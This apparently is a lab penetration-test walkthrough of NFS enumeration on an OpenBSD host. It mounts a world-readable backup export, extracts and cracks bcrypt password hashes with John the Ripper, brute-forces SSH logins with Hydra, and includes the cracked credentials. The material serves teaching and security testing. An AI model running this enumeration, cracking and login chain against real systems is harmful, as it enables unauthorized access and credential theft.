This is our data set we will work from which was gathered during the OSINT phase from the company website:
With this list of email addresses and possible user names we will attempt to gain shell access to the remote through NFS enumeration and exploitaion.
First lets do a quick service scan on our suspected NFS server.
root@asus:~/pentest_notes% nmap -sV -T4 -p111,2049 Starting Nmap 7.01 ( ) at 2018-12-28 04:21 MST Nmap scan report for Host is up (0.0024s latency). PORT STATE SERVICE VERSION 111/tcp open rpcbind 2 (RPC #100000) 2049/tcp open nfs 2-3 (RPC #100003) MAC Address: 08:00:27:30:FA:3B (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 8.97 seconds root@asus:~/pentest_notes%
Query rpcbind for information about what services are currently running on the remote host.
sam@asus:~/pentest_notes% rpcinfo -p program vers proto port service 100000 2 tcp 111 portmapper 100000 2 udp 111 portmapper 100005 1 udp 839 mountd 100005 3 udp 839 mountd 100005 1 tcp 673 mountd 100005 3 tcp 673 mountd 100003 2 udp 2049 nfs 100003 3 udp 2049 nfs 100003 2 tcp 2049 nfs 100003 3 tcp 2049 nfs sam@asus:~/pentest_notes%
We can verify is the NFS service is actually running by querying a specfic port and program number.
sam@asus:~/pentest_notes% rpcinfo -n 2049 -t 100003 program 100003 version 2 ready and waiting program 100003 version 3 ready and waiting sam@asus:~/pentest_notes%
Now we can query the NFS server and ask to see the list of mountable drives
root@asus:~/pentest_notes% showmount -e Export list for /export/backups (everyone) root@asus:~/pentest_notes%
We see that the /export/backups is accessible to everyone so we will try to mount that directory locally. first we need to create a local mount point. we will call this `/mnt/loot`.
root@asus:~/pentest_notes% mkdir /mnt/loot root@asus:~/pentest_notes%
after we create the local mount point we can try and mount the remote directory.
root@asus:~/pentest_notes% mount /mnt/loot root@asus:~/pentest_notes%
If no errors occur then we are good. now lets see what we got by cd'ing into our local mount point `/mnt/loot`.
root@asus:~/pentest_notes% cd /mnt/loot;ls -la total 12 drwxrwxrwx 2 root root 512 Dec 27 20:44 . drwxr-xr-x 4 root root 4096 Dec 28 03:53 .. -rwxrwxrwx 1 root root 5604 Dec 27 20:44 master.passwd.old root@asus:/mnt/loot%
root@asus:/mnt/loot% cat master.passwd.old | less root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh daemon:*:1:1::0:0:The devil himself:/root:/sbin/nologin operator:*:2:5::0:0:System &:/operator:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source:/:/sbin/nologin build:*:21:21::0:0:base and xenocara build:/var/empty:/bin/ksh sshd:*:27:27::0:0:sshd privsep:/var/empty:/sbin/nologin _portmap:*:28:28::0:0:portmap:/var/empty:/sbin/nologin _identd:*:29:29::0:0:identd:/var/empty:/sbin/nologin _rstatd:*:30:30::0:0:rpc.rstatd:/var/empty:/sbin/nologin ... root@asus:/mnt/loot%
We got what looks like a backup of the master.passwd (BSD) file of the NFS server which we will use next to try and gain shell access.
root@asus:/mnt/loot% cat master.passwd.old | awk 'BEGIN{FS=":"} {if ($3 > 1000 || $3 == 0) print $1 ":" $2}' root:$2b$10$7KoamPq9ZOkL4YUYoaNpHu2S671nAjEd7jhiy6Kf.TWCLpA7xwnrG k.madden:$2b$09$d6VfZmp2SbBV1HVo2OYC4ebZeoNspr3XoMVOaCGTaiXaWGng45.3u t.stephens:$2b$09$daF97oYu6wAi3c0gHkKgPuKn0HAeu8yf8u1b3aBRmxEFXyJHyCpHG k.parsons:$2b$09$/goSifrmIrT/sds5UHdPwOyQrO9RcoogBUW.r6JviwMi4s.osmp6G d.hansen:$2b$09$4Z5FxDk1gmLk9/utv8B78OOsEK/fONTPD2kSzFzgGbcXS6t.fxKga k.ball:$2b$09$Oy1xHnN5akCb3T04X2mdGes.9TRm6uL4eCz7N7HVBFj2FV83aoSxe c.harvey:$2b$09$a.FBS1/idqVpL1c1W4BtkuZrLiliBrk9FiYsJ834TJQMLosnLWzde j.macdonald:$2b$09$tNp6xHtL5F1fTCx7cugGh.iqeFwBU5QkXTSDyzHerOLxYwwI0XplC c.gibbs:$2b$09$J21XaR8.IOy30OXzSU61Kefyg6w24GN5i9nshfQkjOAsJqYHFRDRq j.mcpherson:$2b$09$2V.h6JWa/I.zY1g0oc/K3uhnYugP0kMUXGCBTzSngi1Km2XKGM3TO g.joyner:$2b$09$LPPpcASJvm57u7ethcJ9Zezo0btiowPieLNaP2VneMmVZUpu/Us0u c.casey:$2b$09$tkrV9v9ZOoX/lABPhbBTeOXtHX/hogOXqK47KE6N.DQKKlimDw8LO c.eaton:$2b$09$1ftTp/OAcRGb5GWlTqeA8.j4naL0dwlIUh.RsQNez1yEOQjDMr/Cq c.rojas:$2b$09$MMs5cVaZrAlXmT/enxCbSOwzdi3I.PUGaN83wXw5/XHwYRR6oOYY. root@asus:/mnt/loot%
All these entries will be used in a dictonary attack against the master.passwd file using JTR (John The Ripper).
root@asus:~/src/john/run% ./john --format=bcrypt --wordlist=/home/sam/pentest_notes/ry.txt ~/pentest_notes/master.passwd.openbsd Using default input encoding: UTF-8 Loaded 13 password hashes with 13 different salts (bcrypt [Blowfish 32/64 X3]) Cost 1 (iteration count) is 512 for all loaded hashes Will run 2 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status naruto (k.ball) summer (c.harvey) whatever (k.madden) spongebob (c.gibbs) junior (g.joyner) yellow (c.rojas) taylor (c.eaton) cookie (d.hansen) sweety (j.macdonald) joseph (j.mcpherson) dragon (t.stephens) softball (c.casey) 12g 0:00:00:03 DONE (2018-12-28 13:44) 3.508g/s 3.801p/s 49.41c/s 49.41C/s whatever..yellow Use the "--show" option to display all of the cracked passwords reliably Session completed root@asus:~/src/john/run%
After we got the usernames and passwords we could, we can now test for still valid logins using the Hydra tool against SSH.
root@asus:~/pentest_notes% hydra -L -P ssh Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra ( starting at 2018-12-28 13:56:23 [DATA] max 16 tasks per 1 server, overall 64 tasks, 52 login tries (l:13/p:4), ~0 tries per task [DATA] attacking service ssh on port 22 [22][ssh] host: login: k.madden password: whatever [22][ssh] host: login: t.stephens password: dragon [22][ssh] host: login: c.casey password: softball [22][ssh] host: login: c.rojas password: yellow 1 of 1 target successfully completed, 4 valid passwords found Hydra ( finished at 2018-12-26 22:55:50 root@asus:~/pentest_notes%
So out of the 13 users we found, 4 of them still use the same password for their login. Now we can verify if each login works.
sam@asus:~/pentest_notes% ssh -l k.madden The authenticity of host ' (' can't be established. ECDSA key fingerprint is SHA256:JdXLz4mKxMOL/l6tGK/5ETiDUAWVVX0HCmDiuQyuxig. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '' (ECDSA) to the list of known hosts.'s password: OpenBSD 6.4 (GENERIC) #926: Thu Oct 11 13:43:06 MDT 2018 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. nemo$ hostname nemo$ id uid=1001(k.madden) gid=1001(k.madden) groups=1001(k.madden), 0(wheel) nemo$ su t.stephens Password: nemo$ id uid=1002(t.stephens) gid=1002(t.stephens) groups=1002(t.stephens), 0(wheel) nemo$ su c.casey Password: nemo$ id uid=1011(c.casey) gid=1011(c.casey) groups=1011(c.casey), 0(wheel) nemo$ su c.rojas Password: nemo$ id uid=1013(c.rojas) gid=1013(c.rojas) groups=1013(c.rojas), 0(wheel) nemo$ exit nemo$ exit nemo$ exit nemo$ exit Connection to closed. sam@asus:~/pentest_notes%
As you can see all of the users are in the `wheel` group meaning they can su to root if they know the passwd.
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